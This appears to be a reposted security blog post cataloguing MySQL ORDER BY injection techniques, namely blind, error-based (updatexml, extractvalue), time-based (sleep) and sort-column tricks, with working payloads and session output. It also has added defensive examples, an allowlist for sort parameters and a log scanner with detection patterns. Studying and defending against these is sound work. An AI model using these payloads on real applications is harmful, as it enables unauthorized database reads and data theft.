Summary: ORDER BY injection

I want to go back over the things I have already learned and summarize them one by one, including some articles I read earlier and a few small tricks. Let's start with injection.

0x01 Blind injection

1. Distinguishing 1 from 0

a. if

select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| admin | admintest |       1 |
+-------+-----------+---------+
1 row in set (0.00 sec)

b. rand

mysql> select rand(true);
+---------------------+
| rand(true)          |
+---------------------+
| 0.40540353712197724 |
+---------------------+
1 row in set (0.00 sec)

mysql> select rand(false);
+---------------------+
| rand(false)         |
+---------------------+
| 0.15522042769493574 |
+---------------------+
1 row in set (0.00 sec)

Since rand(true) and rand(false) produce different values, the row order after ORDER BY also differs depending on which one the condition evaluates to.

mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| test  | testadmin |       2 |
| admin | admintest |       1 |
| sp4rk | sp4rktest |       3 |
+-------+-----------+---------+
3 rows in set (0.02 sec)

c. regexp

select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

0x02 Error-based injection

select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'

0x03 Time-based injection

select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

0x04 At the ASC/DESC position

1. Blind injection

mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
+-------+
| user  |
+-------+
| admin |
| sp4rk |
| test  |
+-------+

Error-based and time-based injection at this position work the same way as above.

0x05 Using a logical condition to change the sort column

mysql> select user from user order by 1-if(1=1,user,user_id);
+-------+
| user  |
+-------+
| admin |
| test  |
| sp4rk |
+-------+
3 rows in set, 3 warnings (0.00 sec)

mysql> select user from user order by 1-if(1=1,user_id,user);
+-------+
| user  |
+-------+
| sp4rk |
| test  |
| admin |
+-------+

payload:
,if(1=1,user_id,user)
,(case when (1=1) then user_id else user end)
,ifnull(null,user_id)
,rand(1=1)
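Every payload on this page works because ORDER BY accepts an arbitrary expression, and a sort column cannot be passed as a bound parameter: the driver turns it into a string literal that sorts nothing. The defence is therefore an allowlist that maps client-supplied sort keys onto fixed column names. The following is an added example, not code from the original post; it uses SQLite in place of the MySQL table from the mysql sessions above, with a constructed three-row user table and an assumed pair of sortable fields (user, id).

```python
import sqlite3

# Constructed sample data mirroring the three-row user table used in the
# page's mysql sessions (user, password, user_id). Not from the original post.
ROWS = [("admin", "admintest", 1), ("test", "testadmin", 2), ("sp4rk", "sp4rktest", 3)]

# Allowlist: the only sort keys a client may request, mapped to real columns.
# Assumption: the application exposes exactly these two sortable fields.
SORT_COLUMNS = {"user": "user", "id": "user_id"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def open_db():
    """In-memory SQLite stand-in for the MySQL table on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (user TEXT, password TEXT, user_id INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", ROWS)
    return conn


def build_order_by(sort_key, direction="asc"):
    """Map untrusted sort parameters onto a fixed ORDER BY fragment.

    The client-supplied strings are used only as dictionary keys; the text
    that reaches the SQL comes from the allowlist, so expressions such as
    if(...), rand(...), updatexml(...) or a subquery can never be spliced in.
    """
    if not isinstance(sort_key, str) or not isinstance(direction, str):
        raise ValueError("sort parameters must be strings")
    try:
        column = SORT_COLUMNS[sort_key]
        order = SORT_DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError("unsupported sort parameter") from None
    return f"ORDER BY {column} {order}"


def is_accepted(sort_key, direction="asc"):
    """True if the pair would be allowed through build_order_by()."""
    try:
        build_order_by(sort_key, direction)
    except ValueError:
        return False
    return True


def list_users(conn, sort_key, direction="asc"):
    """Safe listing: the ORDER BY text is chosen by the allowlist, not the client."""
    sql = "SELECT user FROM user " + build_order_by(sort_key, direction)
    return [row[0] for row in conn.execute(sql)]


def list_users_bound(conn, sort_key):
    """Why the allowlist is needed: binding the column name as a parameter is
    not a fix. The driver sends it as a string literal, so every row has the
    same constant sort key and the requested ordering is ignored."""
    sql = "SELECT user FROM user ORDER BY ?"
    return [row[0] for row in conn.execute(sql, (sort_key,))]


if __name__ == "__main__":
    db = open_db()
    print(list_users(db, "user"))           # sorted by user name
    print(list_users(db, "id", "desc"))     # sorted by user_id, descending
    print(list_users_bound(db, "user_id"))  # the bound value has no effect on order
    for payload in ("1-if(1=1,user,user_id)", "rand(1=1)"):
        print(payload, "accepted?", is_accepted(payload))
```

The rejected inputs raise before any SQL is built, so the application can log the attempt with the offending value and return a 400 rather than letting the database report an XPATH or subquery error to the client.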

0x06 Using errors to judge true/false

payload:
if(1=1,1,(select 1 union select 2))                 OK
if(1=2,1,(select 1 union select 2))                 error
if(1=1,1,(select 1 from information_schema.tables)) OK
if(1=2,1,(select 1 from information_schema.tables)) error
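A legitimate sort parameter is a bare column name, so any of the constructs used in the sections above (if/ifnull/case, rand, regexp, updatexml/extractvalue, sleep, a subquery, or arithmetic on a column position) appearing in a sort parameter is a strong signal for detection. This added example, not part of the original post, scans constructed access-log lines, URL-decodes the query string as the application would, and flags sort-related parameters that match those indicators. The parameter names and log format are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (common log format). Not from the original post;
# the sort values are the ORDER BY payload shapes covered above, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2018:10:00:01 +0800] "GET /users?sort=user&dir=asc HTTP/1.1" 200 512
10.0.0.5 - - [12/Jun/2018:10:00:02 +0800] "GET /users?sort=1-if(substr(version()%2C1%2C1)%3D5%2C1%2C(select%201%20union%20select%202)) HTTP/1.1" 200 512
10.0.0.5 - - [12/Jun/2018:10:00:03 +0800] "GET /users?sort=1-updatexml(1%2Cconcat(0x5e24%2Cversion()%2C0x5e24)%2C0) HTTP/1.1" 500 233
10.0.0.5 - - [12/Jun/2018:10:00:04 +0800] "GET /users?sort=1-if(ascii(substr(user()%2C1%2C1))%3D114%2Csleep(5)%2C0) HTTP/1.1" 200 512
10.0.0.5 - - [12/Jun/2018:10:00:05 +0800] "GET /users?sort=user%2Crand(1%3D1)&dir=desc HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Parameter names that typically feed an ORDER BY clause (assumed for this app).
SORT_PARAMS = {"sort", "order", "orderby", "order_by", "dir"}

# Each indicator corresponds to a technique shown in the sections above.
INDICATORS = {
    "conditional": re.compile(r"\b(?:if|ifnull)\s*\(|\bcase\s+when\b", re.I),
    "xml_error_function": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
    "nondeterministic_sort": re.compile(r"\brand\s*\(", re.I),
    "subquery": re.compile(r"\b(?:select|union)\b|information_schema", re.I),
    "regexp": re.compile(r"\bregexp\b", re.I),
    "info_function": re.compile(r"\b(?:version|user)\s*\(", re.I),
    "arithmetic_on_position": re.compile(r"^\s*\d+\s*[-+*/]"),
}


def classify(value):
    """Return the names of every indicator matching a decoded sort value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def scan_log(text):
    """Scan access-log text and report sort parameters carrying injection indicators."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so the patterns see the SQL the app saw.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() not in SORT_PARAMS:
                continue
            hits = classify(value)
            if hits:
                findings.append({
                    "line": lineno,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['param']}={f['value']!r} "
              f"status={f['status']} -> {', '.join(f['indicators'])}")
```

The status code is kept in each finding because the error-based variants produce a 500 where the blind variants return 200, which helps separate the two when triaging; the time-based variant is only visible in the request duration, which this log format does not record.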


Reposted from www.cnblogs.com/spark-xl/p/9080398.html